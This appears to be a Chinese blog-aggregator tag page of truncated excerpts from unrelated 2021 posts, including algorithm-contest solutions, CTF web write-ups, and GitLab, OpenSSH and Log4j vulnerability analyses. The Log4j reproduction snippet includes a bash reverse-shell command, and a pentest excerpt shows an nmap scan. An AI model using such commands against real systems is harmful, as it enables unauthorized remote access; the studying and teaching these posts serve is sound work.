2021

# [NOI2021] 路径交点 题解 ## 题意 给定一张 $k$ 层的有向图，第 $i$ 层有 $n_i$​ 个顶点，第 ​$1$ 层与第 $k$​ 层**顶点数相同**。对于第 ​ ​$j$ $(1 \leq j using namespace std; const int N = 205; ......

上一篇CVE-2021-22205 GitLab RCE之未授权访问深入分析(一)复现分析了第一部分也就是携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的，接下来我将分析exiftool漏洞的原理和最后的触发利用。 希望读者能读有所得，从中收获到自己独特的见解。 ......

> 文章写于2021-11-29，首发在[天融信阿尔法实验室](https://mp.weixin.qq.com/s/Y4mGVhbc3agp1adnUs1GmA) ## 前言 安全研究员`vakzz`于4月7日在hackerone上提交了一个关于gitlab的[RCE漏洞](https://hac ......

# 题目源码 ```php admin 'w44m' && $this->passwd '08067'){ include('flag.php'); echo $flag; }else{ echo $this->admin; echo $this->passwd; echo 'nono'; } } ......

Minitab 2021 是一款功能强大的统计分析管理软件，广泛应用于质量管理、数据分析、实验设计和质量改进等领域。 点击获取Minitab 2021 数据导入和管理：Minitab 2021 提供了灵活的数据导入和管理功能，可以导入各种常见格式的数据文件，如文本文件、Excel 表格、数据库等。用 ......

AndroidStudio2021.3logcat工具无法显示日志解决办法 https://blog.csdn.net/weixin_43623271/article/details/127876964 1.File -> setting2.搜索logcat, ->ExperimentalunChk ......

俗话说：工欲善其事必先利其器！持证上岗，考取电工证是成为一名优秀电工的第一步。 近来，很多电工同行在后台询问小编有没有2021年电工考试试题及答案，故小编花了很大的精力整理出一份电工自测考题。本份试卷共80道题目，包含10道判断题、50道选择题和20道多选题，完全模拟电工证考试题型，附答案！ 这份电 ......

漏洞复现 验证是否存在apache log4j2漏洞 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 反弹shell bash -i >& /dev/tcp/ip/port 0>&1 将此命令进行javarunti ......

参考链接：https://www.cnblogs.com/Hekeats-L/p/16964401.html 介绍 该房间对每个 OWASP 主题进行了详细分析，并包含有关漏洞、它们如何发生以及如何利用它们的详细信息。您将通过完成支持性挑战将理论付诸实践。 访问控制损坏 加密失败 注射 不安全的设计 ......

报告链接：http://tecdat.cn/?p=31424 人口出生红利消失，以及后疫情时代的冲击，但消费升级将负面因素拉平，母婴消费市场总量持续稳步上升。"精致妈妈"的营销价值日益凸显。阅读原文，获取专题报告合集全文，解锁文末56份母婴行业相关报告。 当母婴人群成为众多母婴及家庭消费品的重要入口 ......

kali：192.168.111.111 靶机：192.168.111.174 # 信息收集 端口扫描 ``` nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.174 ``` ![image](https://img2023.cnb ......

[鹤城杯 2021]EasyP 题目来源：nssctf 题目类型：web 涉及考点：正则绕过 1. 还是先做代码审计 ```php ``` 这题出现了挺多没见过的东西，还是先介绍一下： > $_SERVER[...]：是一个包含了诸如头信息（header）、路径（path）、以及脚本位置（scrip ......

报告链接：http://tecdat.cn/?p=31419 随着大量企业的涌入，服务机器人产业化即将到来。 阅读原文，获取专题报告合集全文，解锁文末40份服务机器人行业相关报告。 经过多年的发展，我国已经实现了完整的服务机器人产业生态系统。在常态化疫情防控、人口老龄化、技术进步和政策支持等多种因素 ......

一个显然的思路是：在排列 $p$ 的括号串合法的基础上，使得左括号在原括号串中尽量靠左，这样答案更有可能合法。于是我们求出这个原括号尽量靠左的括号串（下文称为“最优括号串”），然后 check 合法性即可。 下文中 $s$ 是排列 $p$ 的括号串。 当 $n=2$ 时，唯一的填法是令 $s_1\g ......

### [题目传送门](https://www.luogu.com.cn/problem/P8512) ## solution 简单题，考虑正着做扫描线，维护最后一次覆盖每个位置的修改时间，这个可以用 $set$ 维护颜色段数均摊。 那么显然对于一个以当前位置为右端点的询问，其答案就是所有最后修改时 ......

[题目链接](https://www.luogu.com.cn/problem/P9445) 数据有点水啊，貌似矩阵大小最大只有 $500$，这导致一堆 bitset 乱搞或者暴力啥的无聊解法能过，这里就不多说了，快进到正题。 二维通配符匹配。 首先根据 Rabin Karp 给每种颜色随机一个权值 ......

## 前言 这个人是蒟蒻，初二，在机房属于是垫底。今年是第一次参加 CSP-S，第二次参加 CSP-J。 ## Day -1 颓。 ## Day 0 学校搞运动会，上午一边看运动会，一边复（摸）习（鱼）。 中午 $1:00$ 出发，在车上又看了会儿算法。全车的人都在颓。 回了酒店后继续颓，感觉明天要 ......

[SWPUCTF 2021 新生赛]ez_unserialize 题目来源：nssctf 题目类型：web 涉及考点：PHP反序列化 1. 检查一下源代码，发现Disallow： 猜测大概有`robots.txt`，扫下后台看看： 额，flag.php都扫出来了，但是进不去，还是老老实实看robot ......

卡死人了。 数据随机写在上面，就是让你预估一下区间长度不会太长的，数据里最长的不超过 $2000$。 暴力扫 $2000$ 个显然过不了 $500000$ 的点，但是 $500000$ 的点 $m$ 为 $1$ 且必定询问整个序列。可以分析出，在随机情况下，前缀和最小最大数量是根号个的，平方后是四次 ......

package PTACZW; import java.util.Scanner; import java.util.ArrayList; import java.io.*; import java.util.StringTokenizer; public class Main{ static Bu ......

# OpenSSH 资源管理错误漏洞(CVE-2021-28041) 漏洞描述： OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。 该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他 网络级 ......

[SWPUCTF 2021 新生赛]no_wakeup 题目来源：nssctf 题目类型：web 涉及考点：PHP反序列化 1. 题目给了一个点击按钮，点进去看看： 进去后就是代码审计了： ```php admin ="user"; $this->passwd = "123456"; } publi ......

一、问题描述 remote: Support for password authentication was removed on August 13, 2021. Please use a personal access token instead. 具体如下： 大概意思：你原先的密码凭证从202 ......

[SWPUCTF 2021 新生赛]pop 题目来源：nssctf 题目类型：web 涉及考点：PHP反序列化、pop链 1. 上来先做代码审计 ```php admin 'w44m' && $this->passwd '08067'){ include('flag.php'); echo $fla ......

[题目链接](https://www.luogu.com.cn/problem/P9441) 记 $g = 1 - f$，即传递下去的宝藏有多少。如果一个海盗在第一轮得到了 $x$，则第二轮将得到 $g^n x$，第 $T$ 轮得到 $g^{Tn} x$，于是在极限情况下总共得到的宝藏为 $\dfr ......

图 ==**基本概念**== 图可以理解成一个二元组，是由点集V和边集E组成的。 G=(V, E)，V表示点的集合，E表示边的集合。 每条边是一幅点对(v,w) v,w都是点集V中的点。(v,w∈V) 图的分类：可以按照边有无方向，可以分为有向图和无向图。 比如上图1中，边AB之间没有画出方向（即点 ......

[SWPUCTF 2021 新生赛]babyrce 题目来源：nssctf 题目类型：web 涉及考点：Cookie注入、代码审计 1. 上来先代码审计 ```php 小饼干最好吃啦！ ``` 题目要求cookie传入参数admin=1，打开F12检查，选择应用程序(Application)，选择C ......

[题目链接](https://www.luogu.com.cn/problem/P9450) 这年 WF 较为简单的一道了，直接模拟即可。首先可以预处理出它顺时针螺旋轨迹的移动步数，方便过会算距离直接查表。我偷懒直接用 map 记录的距离表，这样不用处理复数下标的问题。注意到 $X$ 的数量不会超过 ......

[SWPUCTF 2021 新生赛]easyrce 题目来源：nssctf 题目类型：web 涉及考点：命令执行 1. 题目给了一串代码，直接代码审计 ```php ``` > eval()：把字符串按照 PHP 代码来计算，需以分号结尾 即，我们通过GET传参，可以实现任意命令执行 2. 使用sy ......

[题目链接](https://www.luogu.com.cn/problem/P9449) 可以直接求闵可夫斯基和，这里介绍一种官解。 按照题面的两个评分尺度构建坐标系，将所有可能的 $1$ 号节点分值放在平面上，那么最后的答案一定在凸包上。如果我们知道答案的最终方向，那么问题就比较简单了：就是直 ......